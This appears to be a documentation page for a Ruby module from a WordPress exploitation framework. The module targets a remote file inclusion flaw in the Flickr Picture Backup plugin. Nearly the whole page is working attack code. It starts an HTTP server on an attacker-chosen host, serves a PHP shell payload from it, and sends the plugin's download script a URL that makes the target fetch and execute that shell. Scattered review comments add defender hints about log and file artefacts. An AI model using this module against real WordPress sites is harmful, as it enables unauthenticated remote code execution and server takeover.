class Wpxf::Exploit::FlickrPictureBackupRfiShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::ShellUpload::new
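# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 8
# Sets up the module: runs the superclass initialiser, records the module
# metadata and registers the two options this module adds.
#
# Compared with the listed source, only the description text changes: the
# plugin name was misspelled ("Bacup") and "a HTTP" is corrected to "an HTTP".
# The line breaks inside %( ) are laid out for readability; the collapsed
# listing does not preserve the original ones.
#
# Options registered here:
# - rfi_host: required, no default.
# - rfi_path: required; the default comes from Utility::Text.rand_alpha(8),
#   evaluated once when the module is instantiated.
def initialize
  super

  update_info(
    name: 'Flickr Picture Backup RFI Shell Upload',
    desc: %(
      Flickr Picture Backup suffers from a remote file inclusion
      vulnerability which allows unauthenticated users to download
      and execute a PHP shell hosted on a remote server.

      This module will host an HTTP server to serve the payload, and
      make a request to the target that will initiate the download and
      execution of the payload.
    ),
    author: [
      'Larry W. Cashdollar', # Discovery and disclosure
      'rastating'            # WPXF module
    ],
    references: [
      ['WPVDB', '8803'],
      ['URL', 'http://www.vapidlabs.com/advisory.php?v=190']
    ],
    date: 'Apr 26 2017'
  )

  register_options([
    StringOption.new(
      name: 'rfi_host',
      desc: 'The address of the host listening for a connection',
      required: true
    ),
    StringOption.new(
      name: 'rfi_path',
      desc: 'The path to access via the remote file inclusion request',
      default: Utility::Text.rand_alpha(8),
      required: true
    )
  ])
end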
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 47
# Version check for the plugin. Delegates entirely to
# check_plugin_version_from_readme and returns its result.
#
# NOTE(review): '0.9' is presumably the first release treated as fixed;
# confirm against the helper's signature, which is not shown on this page.
def check
  plugin_slug = 'flickr-picture-backup'
  version_bound = '0.9'
  check_plugin_version_from_readme(plugin_slug, version_bound)
end
execute_payload(url)
Calls superclass method
Wpxf::WordPress::ShellUpload#execute_payload
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 85
# Stops the module's HTTP server, then hands the URL to the superclass
# implementation and returns whatever that returns.
#
# NOTE(review): this is the only call to stop_http_server visible on the
# page. Confirm the listener is also shut down when a run fails before
# reaching this method, so it is not left open.
#
# @param url passed through unchanged to the superclass
def execute_payload(url)
  stop_http_server
  super # bare super forwards url unchanged
end
on_http_request(_path, _params, _headers)
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 63
# Request callback (going by the name; the dispatch is not shown here).
# Returns payload.encoded on every call. The path, params and headers
# arguments are ignored, so the result does not depend on what was requested
# and rfi_path is not checked in this method.
def on_http_request(_path, _params, _headers)
  response_body = payload.encoded
  response_body
end
payload_body_builder()
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 79
# Builds the request body: a Utility::BodyBuilder with a single 'url' field
# whose value is rfi_url. Returns the builder.
def payload_body_builder
  Utility::BodyBuilder.new.tap do |form|
    form.add_field('url', rfi_url)
  end
end
rfi_host()
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 51
# Reads the 'rfi_host' option through normalized_option_value.
# No further validation of the value happens in this method.
def rfi_host
  option_name = 'rfi_host'
  normalized_option_value(option_name)
end
rfi_path()
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 55
# Reads the 'rfi_path' option through normalized_option_value.
# No further validation of the value happens in this method.
def rfi_path
  option_name = 'rfi_path'
  normalized_option_value(option_name)
end
rfi_url()
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 59
# Assembles the URL placed in the request's 'url' field:
# http://<rfi_host>:<http_server_bind_port>/<rfi_path>/<payload_name>
#
# The scheme is fixed to plain http, and the option values are interpolated
# as returned, with no escaping in this method.
def rfi_url
  authority = "#{rfi_host}:#{http_server_bind_port}"
  resource = "#{rfi_path}/#{payload_name}"
  "http://#{authority}/#{resource}"
end
run()
Calls superclass method
Wpxf::WordPress::ShellUpload#run
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 90
# Starts the module's HTTP server, then runs the superclass implementation
# and returns its result.
#
# NOTE(review): the meaning of the `true` argument is not shown on this page
# (presumably a non-blocking start); confirm against start_http_server.
# NOTE(review): nothing in this method stops the server if the superclass run
# raises. Confirm that cleanup happens elsewhere.
def run
  start_http_server(true)
  super()
end
upload_request_params()
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 71
# Returns the request parameters as a Hash with one entry: 'url' => rfi_url.
def upload_request_params
  fields = {}
  fields['url'] = rfi_url
  fields
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 75
# Returns the URL at which the fetched file is expected: payload_name inside
# the 'flickr_backup' directory under wordpress_url_uploads.
#
# For defenders: unexpected files appearing in that flickr_backup directory
# are the on-disk artefact of this issue.
def uploaded_payload_location
  uploads_root = wordpress_url_uploads
  file_name = payload_name
  normalize_uri(uploads_root, 'flickr_backup', file_name)
end
uploader_url()
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 67
# Returns the URL of the plugin script that receives the request:
# flickr-picture-download.php inside the flickr-picture-backup plugin
# directory under wordpress_url_plugins.
#
# For defenders: requests to this script that carry a 'url' field, and the
# outbound fetch the web server then makes to that address, are what to look
# for in access and egress logs.
def uploader_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'flickr-picture-backup', 'flickr-picture-download.php')
end